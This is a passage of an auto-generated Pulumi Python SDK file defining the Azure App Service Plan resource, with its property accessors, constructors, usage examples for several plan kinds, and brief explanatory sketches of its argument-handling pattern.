The maximum number of workers supported with the App Service Plan's sku.
"""
return pulumi.get(self, "maximum_number_of_workers")
@maximum_number_of_workers.setter
def maximum_number_of_workers(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "maximum_number_of_workers", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the App Service Plan component. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="perSiteScaling")
def per_site_scaling(self) -> Optional[pulumi.Input[bool]]:
"""
Can Apps assigned to this App Service Plan be scaled independently? If set to `false`, apps assigned to this plan will scale to all instances of the plan. Defaults to `false`.
"""
return pulumi.get(self, "per_site_scaling")
@per_site_scaling.setter
def per_site_scaling(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "per_site_scaling", value)
@property
@pulumi.getter
def reserved(self) -> Optional[pulumi.Input[bool]]:
"""
Is this App Service Plan `Reserved`? Defaults to `false`.
"""
return pulumi.get(self, "reserved")
@reserved.setter
def reserved(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "reserved", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the resource group in which to create the App Service Plan component.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def sku(self) -> Optional[pulumi.Input['PlanSkuArgs']]:
"""
A `sku` block as documented below.
"""
return pulumi.get(self, "sku")
@sku.setter
def sku(self, value: Optional[pulumi.Input['PlanSkuArgs']]):
pulumi.set(self, "sku", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
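Both `PlanArgs` and `_PlanState` route every attribute through `pulumi.set`/`pulumi.get`, which back the properties with an internal mapping, and their constructors skip `None` values. A simplified, dependency-free stand-in for that pattern; the class and method names here are illustrative, not the Pulumi runtime:

```python
# Toy stand-in for the @pulumi.input_type pattern above: properties delegate
# to a single internal dict, and None values are skipped, mirroring the
# `if x is not None` guards in the generated constructors. Illustrative only.
class _ToyArgs:
    def __init__(self):
        self._values = {}

    def _set(self, key, value):
        if value is not None:  # skip unset values, like the generated guards
            self._values[key] = value

    def _get(self, key):
        return self._values.get(key)

    @property
    def kind(self):
        return self._get("kind")

    @kind.setter
    def kind(self, value):
        self._set("kind", value)

args = _ToyArgs()
args.kind = "Linux"
```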
class Plan(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
app_service_environment_id: Optional[pulumi.Input[str]] = None,
is_xenon: Optional[pulumi.Input[bool]] = None,
kind: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
maximum_elastic_worker_count: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
per_site_scaling: Optional[pulumi.Input[bool]] = None,
reserved: Optional[pulumi.Input[bool]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
sku: Optional[pulumi.Input[pulumi.InputType['PlanSkuArgs']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
"""
Manages an App Service Plan component.
## Example Usage
### Dedicated
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_plan = azure.appservice.Plan("examplePlan",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
sku=azure.appservice.PlanSkuArgs(
tier="Standard",
size="S1",
))
```
### Shared / Consumption Plan
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_plan = azure.appservice.Plan("examplePlan",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
kind="FunctionApp",
sku=azure.appservice.PlanSkuArgs(
tier="Dynamic",
size="Y1",
))
```
### Linux
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_plan = azure.appservice.Plan("examplePlan",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
kind="Linux",
reserved=True,
sku=azure.appservice.PlanSkuArgs(
tier="Standard",
size="S1",
))
```
### Windows Container
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_plan = azure.appservice.Plan("examplePlan",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
kind="xenon",
is_xenon=True,
sku=azure.appservice.PlanSkuArgs(
tier="PremiumContainer",
size="PC2",
))
```
## Import
App Service Plan instances can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:appservice/plan:Plan instance1 /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/mygroup1/providers/Microsoft.Web/serverfarms/instance1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] app_service_environment_id: The ID of the App Service Environment where the App Service Plan should be located. Changing this forces a new resource to be created.
:param pulumi.Input[str] kind: The kind of the App Service Plan to create. Possible values are `Windows` (also available as `App`), `Linux`, `elastic` (for Premium Consumption) and `FunctionApp` (for a Consumption Plan). Defaults to `Windows`. Changing this forces a new resource to be created.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[int] maximum_elastic_worker_count: The maximum number of total workers allowed for this ElasticScaleEnabled App Service Plan.
:param pulumi.Input[str] name: Specifies the name of the App Service Plan component. Changing this forces a new resource to be created.
:param pulumi.Input[bool] per_site_scaling: Can Apps assigned to this App Service Plan be scaled independently? If set to `false`, apps assigned to this plan will scale to all instances of the plan. Defaults to `false`.
:param pulumi.Input[bool] reserved: Is this App Service Plan `Reserved`? Defaults to `false`.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the App Service Plan component.
:param pulumi.Input[pulumi.InputType['PlanSkuArgs']] sku: A `sku` block as documented below.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: PlanArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages an App Service Plan component.
## Example Usage
### Dedicated
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_plan = azure.appservice.Plan("examplePlan",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
sku=azure.appservice.PlanSkuArgs(
tier="Standard",
size="S1",
))
```
### Shared / Consumption Plan
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_plan = azure.appservice.Plan("examplePlan",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
kind="FunctionApp",
sku=azure.appservice.PlanSkuArgs(
tier="Dynamic",
size="Y1",
))
```
### Linux
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_plan = azure.appservice.Plan("examplePlan",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
kind="Linux",
reserved=True,
sku=azure.appservice.PlanSkuArgs(
tier="Standard",
size="S1",
))
```
### Windows Container
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_plan = azure.appservice.Plan("examplePlan",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
kind="xenon",
is_xenon=True,
sku=azure.appservice.PlanSkuArgs(
tier="PremiumContainer",
size="PC2",
))
```
## Import
App Service Plan instances can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:appservice/plan:Plan instance1 /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/mygroup1/providers/Microsoft.Web/serverfarms/instance1
```
:param str resource_name: The name of the resource.
:param PlanArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(PlanArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
app_service_environment_id: Optional[pulumi.Input[str]] = None,
is_xenon: Optional[pulumi.Input[bool]] = None,
kind: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
maximum_elastic_worker_count: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
per_site_scaling: Optional[pulumi.Input[bool]] = None,
reserved: Optional[pulumi.Input[bool]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
sku: Optional[pulumi.Input[pulumi.InputType['PlanSkuArgs']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = PlanArgs.__new__(PlanArgs)
__props__.__dict__["app_service_environment_id"] = app_service_environment_id
__props__.__dict__["is_xenon"] = is_xenon
__props__.__dict__["kind"] = kind
__props__.__dict__["location"] = location
__props__.__dict__["maximum_elastic_worker_count"] = maximum_elastic_worker_count
__props__.__dict__["name"] = name
__props__.__dict__["per_site_scaling"] = per_site_scaling
__props__.__dict__["reserved"] = reserved
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
if sku is None and not opts.urn:
raise TypeError("Missing required property 'sku'")
__props__.__dict__["sku"] = sku
__props__.__dict__["tags"] = tags
__props__.__dict__["maximum_number_of_workers"] = None
super(Plan, __self__).__init__(
'azure:appservice/plan:Plan',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
app_service_environment_id: Optional[pulumi.Input[str]] = None,
is_xenon: Optional[pulumi.Input[bool]] = None,
kind: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
maximum_elastic_worker_count: Optional[pulumi.Input[int]] = None,
maximum_number_of_workers: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
per_site_scaling: Optional[pulumi.Input[bool]] = None,
reserved: Optional[pulumi.Input[bool]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
sku: Optional[pulumi.Input[pulumi.InputType['PlanSkuArgs']]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None) -> 'Plan':
"""
Get an existing Plan resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] app_service_environment_id: The ID of the App Service Environment where the App Service Plan should be located. Changing this forces a new resource to be created.
:param pulumi.Input[str] kind: The kind of the App Service Plan to create. Possible values are `Windows` (also available as `App`), `Linux`, `elastic` (for Premium Consumption) and `FunctionApp` (for a Consumption Plan). Defaults to `Windows`. Changing this forces a new resource to be created.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[int] maximum_elastic_worker_count: The maximum number of total workers allowed for this ElasticScaleEnabled App Service Plan.
:param pulumi.Input[int] maximum_number_of_workers: The maximum number of workers supported with the App Service Plan's sku.
:param pulumi.Input[str] name: Specifies the name of the App Service Plan component. Changing this forces a new resource to be created.
:param pulumi.Input[bool] per_site_scaling: Can Apps assigned to this App Service Plan be scaled independently? If set to `false`, apps assigned to this plan will scale to all instances of the plan. Defaults to `false`.
:param pulumi.Input[bool] reserved: Is this App Service Plan `Reserved`? Defaults to `false`.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which to create the App Service Plan component.
:param pulumi.Input[pulumi.InputType['PlanSkuArgs']] sku: A `sku` block as documented below.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _PlanState.__new__(_PlanState)
__props__.__dict__["app_service_environment_id"] = app_service_environment_id
__props__.__dict__["is_xenon"] = is_xenon
__props__.__dict__["kind"] = kind
__props__.__dict__["location"] = location
__props__.__dict__["maximum_elastic_worker_count"] = maximum_elastic_worker_count
__props__.__dict__["maximum_number_of_workers"] = maximum_number_of_workers
__props__.__dict__["name"] = name
__props__.__dict__["per_site_scaling"] = per_site_scaling
__props__.__dict__["reserved"] = reserved
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["sku"] = sku
__props__.__dict__["tags"] = tags
return Plan(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="appServiceEnvironmentId")
def app_service_environment_id(self) -> pulumi.Output[Optional[str]]:
"""
The ID of the App Service Environment where the App Service Plan should be located. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "app_service_environment_id")
@property
@pulumi.getter(name="isXenon")
def is_xenon(self) -> pulumi.Output[Optional[bool]]:
return pulumi.get(self, "is_xenon")
@property
@pulumi.getter
def kind(self) -> pulumi.Output[Optional[str]]:
"""
The kind of the App Service Plan to create. Possible values are `Windows` (also available as `App`), `Linux`, `elastic` (for Premium Consumption) and `FunctionApp` (for a Consumption Plan). Defaults to `Windows`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter(name="maximumElasticWorkerCount")
def maximum_elastic_worker_count(self) -> pulumi.Output[int]:
"""
The maximum number of total workers allowed for this ElasticScaleEnabled App Service Plan.
"""
return pulumi.get(self, "maximum_elastic_worker_count")
@property
@pulumi.getter(name="maximumNumberOfWorkers")
def maximum_number_of_workers(self) -> pulumi.Output[int]:
"""
The maximum number of workers supported with the App Service Plan's sku.
"""
return pulumi.get(self, "maximum_number_of_workers")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Specifies the name of the App Service Plan component. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="perSiteScaling")
def per_site_scaling(self) -> pulumi.Output[Optional[bool]]:
"""
Can Apps assigned to this App Service Plan be scaled independently? If set to `false`, apps assigned to this plan will scale to all instances of the plan. Defaults to `false`.
"""
return pulumi.get(self, "per_site_scaling")
@property
@pulumi.getter
def reserved(self) -> pulumi.Output[Optional[bool]]:
"""
Is this App Service Plan `Reserved`? Defaults to `false`.
"""
return pulumi.get(self, "reserved")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the resource group in which to create the App Service Plan component.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter
def sku(self) -> pulumi.Output['outputs.PlanSku']:
"""
A `sku` block as documented below.
"""
return pulumi.get(self, "sku")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
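`Plan.__init__` accepts either a fully built `PlanArgs` object or loose keyword arguments, and normalizes both into one property dict before calling `_internal_init`. A minimal sketch of that dispatch, with `ToyArgs`/`toy_init` as hypothetical stand-ins for `PlanArgs` and `_utilities.get_resource_args_opts`:

```python
# Hypothetical stand-ins illustrating the args-object-or-kwargs dispatch used
# by generated resources like Plan; not the real Pulumi helper.
class ToyArgs:
    def __init__(self, resource_group_name, sku):
        self.resource_group_name = resource_group_name
        self.sku = sku

def toy_init(resource_name, *args, **kwargs):
    # If called with an args object, unpack its fields; otherwise use kwargs.
    if args and isinstance(args[0], ToyArgs):
        props = dict(args[0].__dict__)
    else:
        props = dict(kwargs)
    return resource_name, props
```

Both `toy_init("p", ToyArgs("rg", sku))` and `toy_init("p", resource_group_name="rg", sku=sku)` yield the same property dict, which is the behavior the two `__init__` overloads above document.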